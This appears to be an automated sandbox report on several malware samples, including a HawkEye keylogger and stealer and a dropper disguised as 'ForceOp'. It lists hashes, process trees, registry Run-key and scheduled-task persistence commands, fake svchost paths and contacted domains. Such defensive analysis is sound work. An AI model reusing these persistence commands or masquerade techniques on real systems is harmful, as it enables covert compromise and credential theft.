memory/1116-96-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1116-111-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1116-108-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1116-110-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1116-107-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2620-106-0x0000000000400000-0x0000000000554000-memory.dmp

memory/2620-103-0x0000000000400000-0x0000000000554000-memory.dmp

memory/1116-102-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/1116-93-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/5060-113-0x0000000004E00000-0x0000000004E12000-memory.dmp

memory/3740-122-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3740-117-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3740-120-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1496-126-0x00000000005C0000-0x00000000005C1000-memory.dmp

memory/3016-182-0x0000000075370000-0x0000000075921000-memory.dmp

memory/4328-181-0x0000000000400000-0x000000000040F000-memory.dmp

memory/4328-178-0x0000000000400000-0x000000000040F000-memory.dmp

memory/2232-194-0x0000000075370000-0x0000000075921000-memory.dmp

memory/1140-195-0x0000000075370000-0x0000000075921000-memory.dmp

memory/1116-197-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/2232-211-0x0000000075370000-0x0000000075921000-memory.dmp

memory/4624-216-0x0000000000400000-0x00000000004C2000-memory.dmp

memory/5060-218-0x00000000097E0000-0x0000000009846000-memory.dmp

memory/5060-219-0x0000000009CA0000-0x0000000009D3C000-memory.dmp

memory/3628-228-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3628-230-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3628-233-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3628-232-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1344-231-0x0000000000800000-0x0000000000801000-memory.dmp

memory/1116-234-0x0000000000400000-0x00000000004C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\excelsl.exe.log

MD5 0a9b4592cd49c3c21f6767c2dabda92f
SHA1 f534297527ae5ccc0ecb2221ddeb8e58daeb8b74
SHA256 c7effe9cb81a70d738dee863991afefab040290d4c4b78b4202383bcb9f88fcd
SHA512 6b878df474e5bbfb8e9e265f15a76560c2ef151dcebc6388c82d7f6f86ffaf83f5ade5a09f1842e493cb6c8fd63b0b88d088c728fd725f7139f965a5ee332307

C:\Users\Admin\AppData\Local\Temp\tmp50EA.tmp.bat

MD5 7f46a50cebcf890e08ec305f813031f2
SHA1 2ec110cc5a878cb28fc4f5328ad9b4c10545e53a
SHA256 dafb92acf4ac543f0cf22f6eac87f806c2fe00e419cc38b440970326cc9c9f32
SHA512 26f2bf2fee7686e508e3a5257845e155b5f2f74fc42202f25d7b2607dab7dd5fb16e569539ed839007f024c1c5308cdf91591304af73e5c8f6e7559236b450f9

C:\Users\Admin\AppData\Roaming\prndrvest.exe

MD5 c076a7e2e8b63c7447513248cb1f4254
SHA1 05499577aa75cd70900b1aa2e5082e9c6f079d13
SHA256 6a96714c016be87a3f695677e9a8c3af79fa9c6b35f706f9bfbe39253e06595c
SHA512 5dee02ce08b665b4440d096da1c30d5aabdbc3b468b677392bd7c62c1b0f611e65e976b4a3a53be18cc97f925d696fe43d55abbde18faf1655bcaee8c434a2a3

Analysis: behavioral31

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win7-20240708-en

Max time kernel

121s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\Skins\svchost.exe C:\intofont\wincommon.exe N/A
File created C:\Program Files\Windows Media Player\Skins\f4d236fdec2fd03914189c3b26e5cb0dfea9d761 C:\intofont\wincommon.exe N/A
File created C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe C:\intofont\wincommon.exe N/A
File created C:\Program Files\Mozilla Firefox\gmp-clearkey\f4d236fdec2fd03914189c3b26e5cb0dfea9d761 C:\intofont\wincommon.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe C:\intofont\wincommon.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\24dbde2999530ef5fd907494bc374d663924116c C:\intofont\wincommon.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\intofont\wincommon.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\intofont\wincommon.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 2308 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe C:\Windows\SysWOW64\WScript.exe
PID 1808 wrote to memory of 3036 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1808 wrote to memory of 3036 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1808 wrote to memory of 3036 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1808 wrote to memory of 3036 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 3036 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 3036 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 3036 wrote to memory of 3020 N/A C:\Windows\SysWOW64\cmd.exe C:\intofont\wincommon.exe
PID 3020 wrote to memory of 2756 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2756 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2756 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2504 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2504 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2504 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1992 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1992 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1992 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2216 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2216 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2216 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1696 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1696 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1696 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2548 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2548 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 2548 N/A C:\intofont\wincommon.exe C:\Windows\system32\schtasks.exe
PID 3020 wrote to memory of 1048 N/A C:\intofont\wincommon.exe C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe
PID 3020 wrote to memory of 1048 N/A C:\intofont\wincommon.exe C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe
PID 3020 wrote to memory of 1048 N/A C:\intofont\wincommon.exe C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe

"C:\Users\Admin\AppData\Local\Temp\ForceOp 2.8.7 - By RaiSence.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\intofont\msg.vbs"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat" "

C:\intofont\wincommon.exe

"C:\intofont\wincommon.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\ProgramData\Documents\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\svchost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Skins\svchost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe'" /rl HIGHEST /f

C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe

"C:\Program Files\Mozilla Firefox\gmp-clearkey\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cb76972.tmweb.ru udp
RU 5.23.51.23:80 cb76972.tmweb.ru tcp
US 8.8.8.8:53 vh346.timeweb.ru udp
RU 5.23.51.23:443 vh346.timeweb.ru tcp
RU 5.23.51.23:443 vh346.timeweb.ru tcp

Files

C:\intofont\1Udi0TDz635jTrMWFNrE4kqnOIuYIi.vbe

MD5 35f693ab095c33d4c62230d69ff6b43f
SHA1 19e8b126076b5e5d8e8b97f3757ad99357915bf4
SHA256 1a3b550ae14c360fd9600e52924706a356290939317f3a32b35bfa97b5dbc163
SHA512 1e2599c7b10a1fc5c004d7d68c487028d5d2d6a1102af0150ea0c15663819dac42e3a55a769cc532cf45f9f037cece3fcdc2820f2bfbe8439fd0a3d5a16bb4df

C:\intofont\MOS

MD5 cb456215c3333db0551bd0788bc258c7
SHA1 a0b861f6121344b631992c8252fa8748835e4df6
SHA256 7e7b3a01539b5dd82108fe0dc455a76294708bb782f8f7590b06f0975fdf93c1
SHA512 796ccc0f1fc4a990fe3c50f54a2d009e6ddb8e4e062ac1839a2c2c1e6f120311dad66fa86211137cb38cce27a99614085702d5fe9b6f3effc5dd1db0ad879448

C:\intofont\msg.vbs

MD5 01c71ea2d98437129936261c48403132
SHA1 dc689fb68a3e7e09a334e7a37c0d10d0641af1a6
SHA256 0401f2dd76d5ed6f90c82b72e1e7a122ef127bedbaf717532c4bba26d43a0061
SHA512 a668d4216a50ccc699221dd902d8b0f864e44368dc7474fa5659a739154d4e769b85d49b60a73affb8fba7628e7210b0f8106d5652006d1bbba67083513e65d9

C:\intofont\xLg6v1j1ZJy5DZ1pz826KfZq2BmfLM.bat

MD5 9fe442702fb57ffec2b831c3949a74e0
SHA1 e285d89241ef0aeeeb50f65e09a741baf399cb1f
SHA256 d50176a5de27bc9b4c52ebb4e30ec4cbf1e6a79eda4d83a013b220f489a5bcb9
SHA512 548a8df7f0d9278f84eca35bf40638a4572cb625050f7a0684ee14b2117df8307101d8f9383c3fcab23fcf656c21f69db3f4509a037307ed6658ff4c063b4eab

C:\intofont\wincommon.exe

MD5 9134637118b2a4485fb46d439133749b
SHA1 25b60dba36e432f53f68603797d50b9c6cc127ce
SHA256 5dca1a463f5308018c477503a5179f45c468245dd4a84732ee824bd704521acc
SHA512 a6db12e3349c034051940b15adbb530ba34152ccbe41afc210dad7e64331221b3dbae1563a2f3b79a43d12da54eaeac3f30cfb708ebc75ab6a9dfc30a8f1e601

memory/3020-21-0x00000000000F0000-0x000000000021C000-memory.dmp

memory/1048-43-0x0000000000CE0000-0x0000000000E0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab1FE2.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar2004.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral29

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

120s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe

"C:\Users\Admin\AppData\Local\Temp\DiskInternals_Uneraser_v5_keygen.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240903-en

Max time kernel

150s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

Hawkeye family

hawkeye

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\wou\\odm.exe C:\\Users\\Admin\\AppData\\Roaming\\wou\\kja-pex" C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\wou\\odm.exe C:\\Users\\Admin\\AppData\\Roaming\\wou\\kja-pex" C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\DllHost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\DllHost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\DllHost.exe N/A
N/A N/A C:\Windows\SysWOW64\DllHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2148 wrote to memory of 348 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
